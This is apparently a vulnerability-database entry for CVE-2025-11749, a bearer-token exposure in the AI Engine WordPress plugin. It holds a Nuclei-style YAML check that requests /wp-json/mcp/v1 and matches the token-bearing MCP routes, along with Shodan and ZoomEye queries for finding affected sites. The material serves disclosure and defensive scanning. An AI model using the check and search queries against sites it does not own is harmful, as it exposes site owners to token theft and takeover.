漏洞描述
Unauthenticated sensitive information exposure in AI Engine WordPress plugin <= 3.1.3 exposes bearer tokens via REST API endpoints when No-Auth URL is enabled.
CVE-2025-11749: WordPress AI Engine Plugin - Token Exposure
PoC代码[已公开]
id: CVE-2025-11749
info:
name: WordPress AI Engine Plugin - Token Exposure
author: 4m3rr0r
severity: critical
description: |
Unauthenticated sensitive information exposure in AI Engine WordPress plugin <= 3.1.3 exposes bearer tokens via REST API endpoints when No-Auth URL is enabled.
reference:
- https://www.wordfence.com/blog/2025/11/100000-wordpress-sites-affected-by-privilege-escalation-vulnerability-in-ai-engine-wordpress-plugin/
- https://cve.mitre.org/cgi-bin/cvename/cgi?name=CVE-2025-11749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-11749
epss-score: 0.13269
epss-percentile: 0.93868
metadata:
max-request: 1
verified: true
vendor: wordpress
product: ai-engine
shodan-query: 'http.html:"/wp-content/plugins/ai-engine/"'
zoomeye-query: 'app:"WordPress" +web.body:"/wp-content/plugins/ai-engine/"'
tags: cve,cve2025,wordpress,wp-plugin,ai-engine,exposure,token
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/mcp/v1"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "application/json")'
condition: and
- type: regex
part: body
regex:
- '\"\\/mcp\\/v1\\/([^\\/"]+)\\/messages\":{'
- '\"\\/mcp\\/v1\\/([^\\/"]+)\\/sse\":{'
condition: and
# digest: 490a004630440220531dbdeb24d9457f6fa4a09a0d6da4bd5080934af25999de6412d1bfc54d0f8d02207886f1e4cbe2268b7563b8c2ad9c6e7b0bfeaf1f242140dba7ca10eb4171d608:922c64590222798bb761d5b6d8e72950